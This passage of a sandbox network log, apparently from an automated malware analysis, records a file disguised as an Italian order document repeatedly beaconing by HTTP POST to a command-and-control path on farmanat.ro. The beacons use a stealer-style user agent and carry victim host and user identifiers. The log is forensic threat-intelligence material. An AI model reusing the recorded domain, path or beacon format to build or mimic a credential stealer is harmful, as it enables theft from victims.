Nov 25, 2021 10:53:38.800154924 CET	7219	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
651	192.168.11.20	50496	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:39.207844973 CET	7219	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:39.242109060 CET	7219	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:39.300724030 CET	7220	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
652	192.168.11.20	50497	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:39.732608080 CET	7221	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:39.766006947 CET	7221	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:39.815057993 CET	7221	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
653	192.168.11.20	50498	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:40.243963957 CET	7222	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:40.277597904 CET	7222	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:40.330030918 CET	7223	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
654	192.168.11.20	50499	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:40.753144979 CET	7223	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:40.787024975 CET	7223	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:40.837346077 CET	7224	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
655	192.168.11.20	50500	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:41.238327980 CET	7225	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:41.272005081 CET	7225	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:41.321471930 CET	7225	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
656	192.168.11.20	50501	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:41.681848049 CET	7226	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:41.715867996 CET	7226	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:41.768538952 CET	7226	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
657	192.168.11.20	50502	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:42.195312977 CET	7227	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:42.229437113 CET	7227	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:42.284678936 CET	7228	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
658	192.168.11.20	50503	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:42.680123091 CET	7229	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:42.714409113 CET	7229	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:42.764240980 CET	7229	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
659	192.168.11.20	50504	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:43.187163115 CET	7230	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:43.220664024 CET	7230	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:43.272438049 CET	7230	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.11.20	49902	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:43.112375975 CET	6400	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:43.145714045 CET	6400	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:43.198436975 CET	6401	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
660	192.168.11.20	50505	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:43.695677996 CET	7231	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:43.729818106 CET	7231	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:43.784379959 CET	7232	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
661	192.168.11.20	50506	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:44.139014959 CET	7233	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:44.173232079 CET	7233	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:44.225256920 CET	7233	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
662	192.168.11.20	50507	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:44.584131956 CET	7234	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:44.617490053 CET	7234	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:44.667601109 CET	7234	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
663	192.168.11.20	50508	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:45.050530910 CET	7235	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:45.084681034 CET	7235	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:45.135070086 CET	7236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
664	192.168.11.20	50509	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:45.484127998 CET	7236	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:45.518430948 CET	7237	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:45.568433046 CET	7237	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
665	192.168.11.20	50510	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:45.998078108 CET	7238	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:46.031735897 CET	7238	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:46.088895082 CET	7238	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
666	192.168.11.20	50511	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:46.507064104 CET	7239	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:46.541218996 CET	7239	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:46.599484921 CET	7240	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
667	192.168.11.20	50512	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:47.023184061 CET	7240	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:47.056586027 CET	7241	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:47.113775969 CET	7241	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
668	192.168.11.20	50513	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:47.499399900 CET	7242	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:47.533529997 CET	7242	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:47.601064920 CET	7242	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
669	192.168.11.20	50514	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:47.998734951 CET	7243	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:48.032182932 CET	7243	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:48.095859051 CET	7244	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.11.20	49903	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
